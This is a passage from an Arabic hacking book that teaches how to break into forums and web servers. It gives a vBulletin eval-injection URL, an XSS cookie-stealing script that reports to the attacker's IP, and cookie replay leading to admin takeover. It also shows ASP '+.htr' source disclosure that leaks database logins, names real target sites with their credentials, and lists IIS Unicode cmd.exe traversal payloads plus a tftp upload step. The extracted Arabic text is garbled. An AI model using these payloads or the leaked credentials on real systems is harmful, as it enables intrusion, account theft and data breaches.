كماأنهیتمإ صدار Access Token عند محاولتكالإتصال من جهازكبجهاز آخر على شبكتك و یطلق<br />
على هذاالإجراءالولوج عن بعد Logon. Remote<br />
منالأمورالتي یجب مراعاتها عندالحدیث عنأمنالشبكةهوالمحافظة علىأمنالموارد مثلالطابعا ت و<br />
محركاتالأقرا ص و الملفات و التي یقو م مدیرالشبكة بتعیینتصاریح لإ ستخدام هذهالموارد.<br />
و من التصاریح التيقدتعطىللوصول الى الملفات ما یلي :<br />
٦٢
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
<strong>١</strong>-تصریحقراءة و یسمحلك بعر ض و نسخالملفا ت.<br />
٢-تصریحتنفیذللتطبیقا ت.<br />
٣-تصریح كتابة و یسمحبالتعدیلفي محتو ى الملفا ت.<br />
٤- ممنوع ا لإ ستخدام Access. No<br />
والتصاریح ممكن منحهالمستخدمأو مجموعة منالمستخدمین و هذاأٍ سهل.<br />
یمتلككل مورد من المواردقائمةتحكمبالوصول (ACL) Access Control List وكلمعلومةیتم<br />
إدخالهافي ACLیطلق علیها (ACE). Access Control Entry<br />
یتمإنشاء ACE عند منحالتصریح لإ ستخدامالمورد وتحتوي على SIDللمستخدمأو مجموعته<br />
الممنوحةالتصریحبالإ ضافة الى نو عالتصریح،فلو افترضناأن مدیر مجموعة ماقد مُنحتصریحقراءة و<br />
تصریح كتابةلمل ف مافإن ACE جدیدیتمإنشاؤهثمإ ضافتهالى ACL الخا صبالمل ف و سیحتوي<br />
ACEعلى SIDلمدیرالمجموعةبالإ ضافةالىتصریحقراءة وتصریح كتابة.<br />
هناك نوعان ل : ACE<br />
<strong>١</strong>-الوصول مسمو ح AccessAllowed.<br />
٢- الوصول ممنو ع AccessDenied ویتمإنشاؤهاإ ذاكانتصریحالوصول هو Access. No<br />
و هكذا عندما یحاول مستخدم ماالوصولالى مورد مایتم مقارنة SID الخا صبه مع SIDsفيكل<br />
ACEمن ACLللمورد.<br />
في ویندوز NT و ویندوز ٢٠٠٠یتمترتیب ACEب حی ثتكون AccessDeniedقبل ACEs<br />
فإ ذا وجد SID<br />
فستمنع من الوصول الىالمورد وإلافسیبحثفي AccessAllowedللتأكد ACEs منالحقوق<br />
الممنوحةلكفإنلم یعثر على SID مطابقلخاصتكفستعر ض رسالةتحذیرتمنعك منالوصولللمورد.<br />
خاصتكفيأي من AccessDenied ACEs<br />
AccessAllowed ACEs ،<br />
ملخ صالدرس:<br />
هناك بع ضالإجراءات التي یجب اتخاذهاللمحافظة علىأمن الشبكة و منها:<br />
تدریبالمستخدمین ، حمایة المعدا ت ،تشفیرالبیانا ت ،استخدامأجهزة عدیمة الأقرا ص ، مراقبةالعملیات<br />
التيتجرى علىالشبكة.<br />
هناك نظامانأساسیان لإعطاءالتصاریح والحقوق<br />
<strong>١</strong>- المشاركةالمحمیة بكلمة مرور.<br />
٢ -تصاریح الوصول...<br />
:<br />
٦٣
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"درس مفصل عن كیفیة اختراق المنتدیات وطرق حمایتها"<br />
$$$$$$$$$$$$$$<br />
الكاتب:العقرب الأحمر<br />
$$$$$$$$$$$$$$<br />
الدرسیتكون من ٧ نقاط<br />
ا-لمنتدیات وانواعه<br />
طریقةاختراقه<br />
٣-أختراق ال<br />
سرفراتالویندوز ودورهفياختراق المنتدیات<br />
٥-النسخه المنتشرهفي النت ودورالمعربین العرب وحقیقةالموضو عوتعریبهم<br />
٦ -الحمایه منالمخترقینبنسبة 80% لااجهزتكم ومنتدیاتكم<br />
- ٧ المجلهبجمیع نسخهقابل لاال ختراق<br />
SQL<br />
<strong>١</strong><br />
-٢<br />
-٤<br />
الدروس جمیعهابالصورة وحقائق ودلائل<br />
قمت بتجمیع الدروس والاضافتة علیهوتعدیله100%<br />
ارجو عدم نقلالدروس وكوبي<br />
*************************************************************************<br />
<strong>١</strong>- المنتدیات وانواعه<br />
^^^^^^^^^^^^^<br />
٢<br />
المنتدیاتاولا منتدیات جون Poweredبجمیعاصداراته by: vBulletin<br />
<strong>١</strong>لماذالم یخترقاحدي منتداهم حتيالان<br />
الایوجدلهم ملیون عدو<br />
٣الایخترقون عشراتالمنتدیات یومیا ولماذالیس منتدي جون وحمایتهتصلالي %60في السرفر<br />
تفضل هذاثغراتبموقعهماشوي شغلكمانتصللقلبهم لاارید التطویلالانبس مثاللمن یفهمه<br />
http://www.<strong>vb</strong>ulletin.org/index.php?topic=<br />
alert(document.cookie)<br />
2<br />
http://www.<strong>vb</strong>ulletin.org/index.php?<br />
|=forum/view.php&topic=../../../../../../../etc/passwd<br />
٦٤
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
******************************************************************************<br />
طریقةاختراقه<br />
^^^^^^^^^<br />
جمیعالاصدارات<br />
فلنبدي من صفر نسخة <strong>١</strong><strong>١</strong>٣ بتذكرو یمكن بعضكم<br />
كلنانعر ف منتدیات الفيبي ، وهذا النو ع من المنتدیات یحب یركبهقلیلین الخبرهفيأغلب الأحیان ، وهذا<br />
-٢<br />
المنتد ى هوالمعرو ف عندناالعرب بكثره<br />
الأول اللي كتبهالفرنسي (على ماأعتقد ) Jouko Pynnonen<br />
) is a <strong>com</strong>monly used web forum http://www.<strong>vb</strong>ulletin.<strong>com</strong>/vBulletin (<br />
system written in PHP. One of its key features is use of templates,<br />
which allow the board administrator to dynamically modify the look of<br />
the board.<br />
vBulletin templates are parsed with the eval() function. This could be<br />
somewhat safe as long as the parameters to eval() are under strict<br />
control. Unfortunately this is where vBulletin fails. With an URL<br />
crafted in a certain way, a remote user may control the eval()<br />
parameters<br />
and inject arbitrary PHP code to be executed.<br />
A remote user may thus execute any PHP code and programs as the<br />
web<br />
server user, typically "nobody", start an interactive shell and try to<br />
elevate their privilege. The configuration files are accessible for the<br />
web server so the user can in any case access the MySQL database<br />
containing the forums and user information.<br />
According to the authors the vulnerability exist in all versions of<br />
vBulletin up to 1.1.5 and 2.0 beta 2. The bug does not involve buffer<br />
overrun or other platform-dependant issues, so it's presumably<br />
exploitable under any OS or platform.<br />
DETAILS<br />
=======<br />
vBulletin templates are implemented in the following way: the<br />
gettemplate() function in global.php is used to fetch a template from<br />
٦٥
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
database. The code is then passed to eval(). If we take index.php for<br />
an example, there's this code:<br />
if ($action=="faq") {<br />
eval("echo dovars(\"".gettemplate("faq")."\");");<br />
}<br />
The dovars() function does some variable replacing, such as replace<br />
with .<br />
The gettemplate() function is defined in global.php:<br />
function gettemplate($templatename,$escape=1) {<br />
// gets a template from the db or from the local cache<br />
global $templatecache,$DB_site;<br />
if ($templatecache[$templatename]!="") {<br />
$template=$templatecache[$templatename];<br />
} else {<br />
$gettemp=$DB_site->query_first("SELECT template FROM template<br />
WHERE title='". addslashes($templatename)."'");<br />
$template=$gettemp[template];<br />
$templatecache[$templatename]=$template;<br />
}<br />
if ($escape==1) {<br />
$template=str_replace("\"","\\\"",$template);<br />
}<br />
return $template;<br />
}<br />
For effectiveness the function implements a simple cache for template<br />
strings. After fetching them from the database they're stored in the<br />
templatecache[] array. This array is checked for the template before<br />
doing the SQL query. Unfortunately the array is never initialized, so<br />
a user can pass array contents in the URL, e.g.<br />
(for simplicity not %-escaped)<br />
٦٦
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
http://www.site.url/index.php?action=faq&templatecache<br />
[faq]=hello+world<br />
With this URL, you won't get the FAQ page, but just a blank page<br />
with the words "hello world".<br />
The eval() call above will execute<br />
echo dovars("hello world");<br />
As if this wouldn't be bad enough, a remote user may as well pass a<br />
value containing quotation marks and other symbols. Quotation marks<br />
aren't always escaped as seen in the code above, in which case<br />
index.php could end up executing code like<br />
echo dovars("hello"world");<br />
This would produce a PHP error message due to unbalanced quotes. It<br />
doesn't take a rocket scientist to figure out how a remote user could<br />
execute arbitrary code from here, so further details about exploitation<br />
aren't necessary. If your vBulletin board produces an error message<br />
with an URL like the one above prefixed with a single quotation mark,<br />
it's definitely vulnerable.<br />
The above example works with the "Lite" version. The <strong>com</strong>mercial<br />
versions<br />
are vulnerable too, but details may differ. After a little experimenting<br />
on the Jelsoft's test site I found some of the <strong>com</strong>mercial versions also<br />
have an eval() problem with URL redirecting, e.g.<br />
"world http://www.site.url/member.php?acti...ypass&url=hello<br />
and a similar one in the Lite version:<br />
http://www.site.url/search.php?acti...s&templatecache<br />
[standardredirect]=hello"world<br />
تعرفونالكلام هذا ولا داعي لترجمه ، منالكلام هذاأنت ممكنترسلأكواد خل ف urlتنفذفيالسیرفر ،<br />
تضعهابدل الكلمه hello+world الغبیه ،جرب مثلا<br />
:<br />
<strong>١</strong>- ركبفي جهازك ملقم ویبأي ملقمتحبه ممكنتركب علیه <strong>vb</strong> 113 or 115<br />
٩٠ عندكفي جهازك (طریقه فت حالبورتتكون على مجازك (<br />
٣ -أرسل ال url هذا الىالسیرفر<br />
٢- أفتحالبورت<br />
٦٧
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
search.php3?action=simplesearch&query=searchthis&templatecache[s<br />
tandardredirect]="%29%3B%24fa="
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
وأعذروني علىالإملاء والنحو<br />
ملاحظهأخیره : وهي عند ماتشبك معالسیرفر عن طریقالبورت ٩٠أرسل<br />
-d downloads<br />
تنزللكالداتبی سكلها ، وللأس ف طلعت غیر مشفره وهذا یدل علىالتخل ف ، ولكنفي الإ صداره٢٫٢ x<br />
شفرت ولكنكسرتها وقریبا أقوللك عنها<br />
تم شرح طریقة الاختراق من <strong>١</strong><strong>١</strong>٣الي <strong>١</strong><strong>١</strong><br />
طریقةاخترا ق من <strong>١</strong><strong>١</strong>٥الي ٢٢٥<br />
المتطلبا ت) WebServer :تركیب سیرفر على جهازكالشخصي) + متصفحانترن ت) اكسبلورر) .<br />
المستوى : متوسط<br />
ملاحظة : هذهالطریقةلس تلل vBulletinفقط !!یمكنانتجربها علىانواعاخرى من المنتدیات<br />
.<br />
----------<br />
:<br />
---------<br />
الثغرة<br />
تنقسم طریقةالعملالى عدةاقسام ..أولا بع ض السكربتاتالخبیثةالتيتسرقالكوكیزبالاضافةالىجعل<br />
المنتدى یستقبل<br />
بیانات من مكان خاطيء ..لكن یشترطان یسمح المنتد ى بأكواد ال .. HTML<br />
قم بكتابة موضو ع جدیداو رد<br />
هذا الكود<br />
(في منتد ى یدعمال .. ) HTMLثماكتباي موضو ع والص قبینالسطور<br />
:<br />
document.write('';<br />
مع ملاحظةتغیرال IP Adress الى رقمال IP الخا صبك .<br />
. (<br />
وعندما یقوم شخ ص ما بقراءة محتو ىالصفحةفانالسكربتالذيقمنابوضعه سیقوم بتنفیذالاوامرفي<br />
جهازه وقراءةجزء مناحد ملفاتالكوكیزالتيتحتوي علىالباسورد الخاصةبالمنتدى ..ثم یقوم<br />
السكربت بتحویل هذهالسطورالى رقم الايبيالذيقمنا بكتابته سابقا (مع ملاحظةانه یجبان یكون على<br />
جهازي سیرفر مثل IIS او غیرها<br />
او Apache<br />
وبعدان تتمالعملیةبنجاحقم بفتح مل فال Log الخا صبالسیرفر الذي یحتویه جهازك<br />
مثاللوكانالسیرفراباتشي<br />
ستجد جمیعالاوامرالتي طلبتها منالسیرفر ..إلخ<br />
..<br />
.. فتاح المجلد Apche واختر logs واختر . Log Acces<br />
اب حث عنالكودالخا<br />
صبالباسورد<br />
: مثال<br />
..<br />
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb<br />
٦٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
ddf90622;%20sessionhash=a<br />
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54<br />
20]=1012444064;%20bblastvi<br />
sit=1011983161<br />
فكرقلیلاالان ..این الباسورد ؟؟<br />
الباسورد موجودةلكنبطریقة مشفرة یصعبكسرها ..اذن مالحل ؟<br />
قمبنسخالكود الذي وجدته والصقهفيالمتصفح ..بهذا الشكل<br />
http://www.victim.<strong>com</strong>/<strong>vb</strong>/index.php?bbuserid=<br />
[userid]&bbpassword=[password hash]<br />
ستجد عبارة : "أهلا بعودتك یا (اسمالذي سرقت منهالكوكیز....) "<br />
في هذه الحالةانتالانتستطیع التحكم بكل شي وكانك مدیرالمنتدى الذي سرقت<br />
لكننا نحتاج الىكلمة المرورللدخولالىلوحة التحكم ..اذهب الى التحكم) وقم بتعدیلالبریدالالكتروني<br />
الىبریدك الخا ص وثمقم بتسجیل الخروج<br />
تستطیعاستقبالبرید یحتويباسوردالادمن<br />
) منهالكوكیز) ..<br />
)<br />
..ثماذهب الىاداة .. Password Forgot وعندها<br />
..<br />
**********************************************************************************<br />
SQL<br />
^^^^^^^^^^^^^<br />
٣-أختراق ال<br />
:<br />
یمكنكاستخدامبرنامجالعقرببیكوناسرعلمنلدیه نسخ منه<br />
س فيالبدایة ماهيالاسكیوال( ( SQL ؟؟<br />
الاسكیوال هي عبارة عنقاعدبیاناتتحتوي على جداول واغلب المواقعالتيتكون صفحاتها منتهیة ب<br />
ASPهي صفحا تتسحببیاناتها منقاعدة SQLوصفحات ASP ممكنانتكونكنز منالمعلومات<br />
لاختراققواعدبیانات SQL وهذا ماسو ف اشیرالیه لاحقا ، و SQL تتنصت علىالبورت <strong>١</strong>٤٣٣<br />
ایضا مااریداناخبركبهانال SQLقدتحتوي على اكثر منقاعدةبیانات وكلقاعدةبیاناتتحتوي<br />
على عدد من الجداول یمكن ان تتصوركبرقواعدبیانات SQL والعددالكبیر منالبیانات التىتحتویها<br />
س مالذي یمكناناستفید منهاذااخترقتقاعدةبیانات SQL؟<br />
هذا على حسب نشاطالموقعاذاكان هذا الموقع منتد ى لااقصد منتدیات PHPبل منتدیات ASPفي<br />
الغالب سو فت حصل على جمیعاسماء<br />
المستخدمین وكلماتالسر وبامكانكتعدیل وحذ فاي موضوع وصلاحیاتلمتكنت حلمبها ،امااذاكان<br />
الموقع یحتوي على میزة<br />
قائمةالمراسلا تفسو فت حصل علىاعداد خیالیة منالایمیلات ، عندهاقمبانشاء شركةللدعایة والاعلان<br />
وسو فتصبحثریااذنلاتنسى LinuxRay_<br />
توقعانتجد اي شئ داخلقواعدبیاناتمعلوماتاشخا ص -ارقام هوات ف<br />
.<br />
- عناوین -تورایخالمیلاد ،<br />
ممكنانتصبح . Administrator<br />
:<br />
اعر فانهقداصابك المللالانلكناستعد نشاطك من جدیدفالطریق مازال طویلا<br />
س مالذيتحتاجةللدخول علىقواعدبیانات SQL؟<br />
...<br />
:<br />
تحتاجفقطلل User Name و Passwd<br />
س<br />
: منایناحصل علىاسم المستخدم وكلمةالمرور ؟<br />
٧٠
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
هناك طرق عدیدةلل حصول على User name and Passwd منهاكمااسل ف صفحاتال ASP<br />
وملفاتاخرى من نو ع sql.*هناكثغراتكثیریمكن<br />
انت حصل منها علىكلمات المرور مثلثغرة +.htr<br />
كی فتستخدم هذهالثغرة :<br />
http://target/page.asp+.htr<br />
: targetالموقعالهد ف<br />
asp صفحة Page :<br />
: htr.+الثغرة<br />
هذه الثغرةتقوماحیانا بفتح صفحةبیضاء لاتحتوي علىاي حر ف ....اعر فانك سوف تتساءل مالفائدة<br />
اذن منهاالفائدة هو خل ف هذهالصفحةالبیضاءاذهب الى Viewلكيتر Source ىاوامرالبرمجة<br />
الخاصة ب ASP التى لایمكنلكانتراهافي الوضع العادي مثل<br />
:<br />
Set DB= Server.CreateObject("ADODB.Connection")<br />
DB.Open "DRIVER=SQL<br />
Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer<br />
Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666"<br />
< %<br />
%><br />
------------------------------------------------------------------<br />
في الكودالسابقترىاناسم المستخدمهو _LinuxRay<br />
وكلمة السرهي ٦٦٦٦٦٦٦<br />
------------------------------------------------------------------<br />
الشئالمضحكانهاحیانااذاكان هناك خطأفي صفحةال ASP مثلالاتي :<br />
AMicrosoft VBScript runtime error '800a01a8'<br />
Object required: 'Conn'<br />
/filename.inc, line 5<br />
هناك مل ف ینتهيبامتداد *.inc هذا ملف یحتوي علىاوامریتمتنفیذها من جانبالملقم ویحتوي علىاسم<br />
المستخدم وكلمة المرور<br />
اذن ماذاتنتظرقمبسحب هذا المل ف وذلكباضافةاسمالمل ففي عنوان الموقع .<br />
وممكنانتر ى مثل هذاالامرفي صفحة ASP<br />
٧<strong>١</strong>
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
عندتطبیقالثغرة علیها هذایعنياناوامرالبرمجة داخل مل ف database.inc<br />
<br />
وهناك عدة ملفاتتحتوي علىكلمةالمرور مثل ملفات<br />
global.asa<br />
++global.asa<br />
beforemilion-global.asa<br />
-global.asa<br />
milion.sql<br />
global-direct.asa<br />
لی س منالضرورةانتكونالملفاتبهذهالاسماءلكن هذا هوالمعتاد علیه منقبل مبرمجین SQL<br />
وكل<br />
ماعلیكفعلهانتكتباسمالصفحة مثلالاتي :<br />
global.asa+.htr<br />
هناكثغرةقدیمةفي IIS 3 وهيانتضی ف بعد صفحة ASP هذاالرمز data$::كما یلي<br />
file.asp::$data<br />
هذه الثغرةلاتعملالا على IISفلا 3 تتعب نفسك بتطبیقهافقطللعلم لا اكثر .<br />
لقداقتربنا من النهایة<br />
... ماذا بعدال حصول علىاسم المستخدم وكلمة المرور ؟؟<br />
بعدهاالدخول علىقاعدةال !! SQL<br />
هناك عدةبرامجتدخل علىقاعدةالبینا تانااستخدم Visualلكني interdev 6.0 مازلت افضل<br />
استخدام البرنامجالسهل ACCESS 2000<br />
كل ما علیك فعلههو فتح البرنامح الذهاب الىقائمة<br />
File<br />
اختر<br />
New<br />
ومنقائمةالملفات الجدیدةاختار<br />
.<br />
Project (Exiting Data)<br />
اي مشرو عقاعدةبیانات موجودة<br />
سیظهرلك مربع لانشاء الملفاختر<br />
Create<br />
٧٢
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
ايانشاء<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
الان ستر ى مربع<br />
Data Link Properties<br />
تحتاجفق طلثلا ثمعلوما تاسم الموقعاوالايبي -اسمالمستخدم -كلمة المرور<br />
<strong>١</strong>-ادخلاسمالموقعفي صندو ق Select or enter server name<br />
٢-اسمالمستخدمفي User Name<br />
٣-كلمة السر Password<br />
ملاحظة (قم بإزالةالصح من مربع Password) Blank<br />
اضغطفي البدایة على Testفيالاسفل Connection لاختبارالاتصال بقاعدة البیانا تاذا رأیت هذه<br />
العبارة Test Connection Succeeded<br />
فمعناهانالاتصال بقاعدةالبیاناتتمبنجاح.<br />
یمكنكالانانتختارايقاعدةبیاناتترید الدخول الیها منالقائمةالمسندلة<br />
:<br />
Select the data base on the server<br />
واضغط على OK او موافق .<br />
فئ رانالتجارب<br />
موقع<br />
:<br />
http://www.moe.gov.sa/<br />
-1قمبالدخول علىالصفحة التالیة :<br />
http://www.moe.gov.sa/news_admin.asp<br />
سترى مایلي<br />
Microsoft VBScript runtime error '800a01a8'<br />
Object required: 'Conn'<br />
/news_admin.asp, line 7<br />
ثم طب ق علیهاثغرة htr كتالي:<br />
http://www.moe.gov.sa/news_admin.asp+.htr<br />
٧٣
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
اذهبالى السورس لترى<br />
< ! --#include file = "database.inc"--><br />
قمبسحب<br />
ملف database.inc كتالي:<br />
http://www.moe.gov.sa/database.inc<br />
سو فترى مایلي<br />
Set DB= Server.CreateObject("ADODB.Connection")<br />
DB.Open "DRIVER=SQL<br />
Server;SERVER=CNW2;UID=sa;PWD=;APP=Microsoft (R) Developer<br />
Studio;WSID=CNW2;DATABASE=moe_dbs", "sa", "123321"<br />
:<br />
<br />
هلتعر ف مالذيامام عینكالانانهاسم المستخدم وكلمةالمرور<br />
انااعر فان لااحد یحب مادة<br />
الكیمیاء .<br />
..... سار عبالتشبیك علىقاعدةالبیانات<br />
فأرالتجارب الثاني<br />
موقع<br />
http://www.itsalat.<strong>com</strong>/<br />
1 - User name : sa Passwd : sp2000<br />
:<br />
********************************************************************************<br />
-٤<br />
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^<br />
سرفراتالویندوز ودورهفياختراق المنتدیات<br />
ن حن الهكرز واي هكرز مبتديیعر فثغرات الویندوز جیدا دا<br />
وهي نظامفاشل ٨٠% وثغراتهبالاالو ف<br />
ولاانصحايا خلدیه منتدي وموقع یستضیف سرفرات ویندوز راحاقلكملی شبااثبتات<br />
صور٢ هو صورةلجمعیةامریكي مهم وحجمقاعداتالبیانات <strong>١</strong>٫٥كیكیعني 15000<br />
خمسة ملین مشتركتماختراقهالبارحهبنفسي جاريتحمیل الموقعلجاهزيكاملا<br />
میك ویحتوي علي<br />
<strong>١</strong>-ثغراتالهتمل<br />
٢-الفرون تبیج<br />
٧٤
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
-٣<br />
IIS<br />
مخلفاتالافتبي والاستفاد منهكثیرلهكرز<br />
٤-ثغراتالبرامج<br />
٥- عدمتمكن حمایةالنظام100%<br />
لاذلكانصحالاخوهبالابتعاد عن سرفرا تالویندوز وبرامجهم<br />
بدایةنعر ف ماهي<br />
هي خدمه متواجدةفي ویندوزالفینبروفشنال وویندوزانتيIIS ال<br />
...IIS5.0وویندوزالفین یمتلك الاصدارةالخامسة من ملقممعلوماتالانترنت<br />
بسماالله نبدأ<br />
توجد نقطة ضع ففيالاياياس ٤او ٥ وهذهالنقطةتستغلبطریقة سهلة جداً<br />
وتسمى هذه النقطةبالیونیكود<br />
وتنفیذها سهلاً لایحتاجالى خبرة عمیقةفي مجالاختراق المواقع<br />
ولكن نق ف عند هذه النقطةللمبتئیدئن<br />
المبتدئین عامةً یفكرونالانفياختراق عدة مواقع شهیرةبهذهالطریقة<br />
ولكن لا هذهالطریقة غیر مجدیة معالمواقع الشهیرةاو غیرالشهیرة<br />
لان نقطة الضع ف هذهلاتوجدالافي ویندوزالفیناوانتي<br />
وأغلبالمواقعالشهیرةتستخدمانظمةالیونكس واللنكس<br />
أيان ویندوزانتي اوالفین نظام حمایته محدودة وكل یومتطلعثغرات جدیدة<br />
لكنبوسع مدراءالمواقع ایقا ف نقطةضع ف من نقاطالاضعا ف الموجودةفيالانتي<br />
لكن بتلكالطریقةقد یكونونجعلو حاجزاًلهم منالهكرة<br />
ولكنلیس دائماً<br />
وتنفذ من داخلالمتصفح<br />
وطریقةتنفیذالثغرةكالاتي<br />
:<br />
../winnt/system32/cmd.exe?/c+dir+c:\ http://www.xxxxxx.<strong>com</strong>/scripts/..Á<br />
ركزوهناالان بعد دوتكومبدأ تتنفیذ الثغرة<br />
وبإ مكانكأیضا دخولاي مل ف ولیسفقط رؤیة السي:c هذهالثغرةتسمحلكب عر ض جمیع ملفات<br />
وتوجدأكثر منثغرة وهي<br />
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\<br />
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\<br />
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system<br />
32/cmd.exe\?/c\+dir+c:\<br />
٧٥
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
:<br />
وطریقةتنفیذها من المتصفح<br />
ومكانتنفیذها بعداسمالموقع<br />
مثال<br />
http://www.xxxxx.<strong>com</strong>/à/€/à/€/à/€/¯....2/cmd.exe/? /c \+<br />
أي بعد دوتكوم<br />
بع ضالناس یسألون مالذي یظهراو علىاي شكل یظهر<br />
الحلبسی ط<br />
Dirهذاالامرلوقمت بكتابتهفي نافذة الدوس ستظهرلكالملفات<br />
وطریقة ظهور الملفاتفيالمتصفحتقریبا<br />
بنفس طریقة الدوس<br />
إ ذا نجحتفيتنفیذ الثغرة واظهرتالملفا تامامك فتبدأفيتنفیذالخطوةالثانیة<br />
الخطوة الثانیة عملابلودللمل فالذيتریدتحمیله<br />
وعمل الأبلودأیضاً لایحتاج الى خبرة<br />
لكن هنالكشروطلكيتعملابلود<br />
یجب التأكد منأن التيإفتيبي مثبت علىالموقعالض حیة<br />
وللكي تتأكدإتبعالاتي<br />
یجب الدخول على مل ف السستم٣٢ ولكيتد خله یجبأنتضی ف بع ض الكلمات علىالثغرةالتي نجحتفي<br />
تنفیذها<br />
مثال :<br />
../winnt/system32/cmd.exe?/c+dir+c:\ http://www.xxxxxx.<strong>com</strong>/scripts/..Á<br />
هذه الثغرة عملتفيالموقع المطلوب ورأیت الملفات<br />
لاحظالتغیر<br />
http://www.xxxxxx.<strong>com</strong>/scripts/..Á<br />
../winnt/system32/cmd.exe?/c+dir+c:\Winnt\Sytem32\<br />
ماوضع علىالثغرة هوأسماءلملفات متواجدة داخل الویندوز Winnt\Sytem32\<br />
أي یجب علیكالدخول على هذه الملفاتلكي تتأكد<br />
بع ضالقراءیتسالون .....الثغرةالتي نستخدمهالیست متطابقة<br />
للتطابقها یجب علیك الدخولبايكان على ملل ف السستم<br />
ممكن یكوناحدالقراءاشتغلتمعاه هذه الثغرة<br />
http://www.xxxxx.<strong>com</strong>/scripts/..ü€€€....exe?/c+dir+c:\<br />
ویقولكی فادخل على مل فالسستم<br />
الحل هو واحد یجب علیكإ ضافةاسماء الملفاتلكيتدخل علىالسستم٣٢<br />
اي بعد هذاالامتداد<br />
\:c+dir+cهناتضی فأسماء الملفات<br />
http://www.xxxxx.<strong>com</strong>/scripts/..ü€€€...Winnt/System32/<br />
كماقلنا سابقاَلاتحتاج الى خبرة<br />
وبعد دخول مل فالسستم ستظهرلك محتویاته<br />
ویجب على آنذاك الب حث عنبرنامج یسمي<br />
tftp.exeیعني دور على هذاالبرنامجالین ماتلقاهوتتأكد منانهفيالجهاز<br />
لان هذاالبرنامجیعتبر شرطلكيتعملابلودللصفحة<br />
ولولقیتالبرنامج اتفاءلبالخیریعنيبإذنااللهتعبك ماهو رایح على الفاضي<br />
مع هذه الثغرة ولكن هذالیس شرط<br />
٧٦
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
C:\<br />
.........................................................................................<br />
والشرطالثاني هو<br />
یجبأن یكون عندكبرنامجالتيإ فتيبي<br />
وهذا البرنامجتقدرتنزله من هذا العنوان<br />
www.geocities.<strong>com</strong>/anorR1234/tftpd32.zip<br />
\:Cوبعد ماتنزل البرنامجوتفكالضغط منه منالافضلإنكت حطه داخلال<br />
وتحطأیضا البرامجأو الصفحةالتيتریدأنتعمللهاأبلودفيالسي<br />
ت حطهفيالسي الى داخل جهازك مو الى دالخل الموقع<br />
وتشغل البرنامج<br />
tftp32.exeوتتركهیعملالىأنتنتهى من مهمتكالأساسیة<br />
أسمعكلامي وحطكل شيفي<br />
لأنكلو حطیتهابإذناالله را حتنجح المهمه<br />
-----------------------------------------------------------------<br />
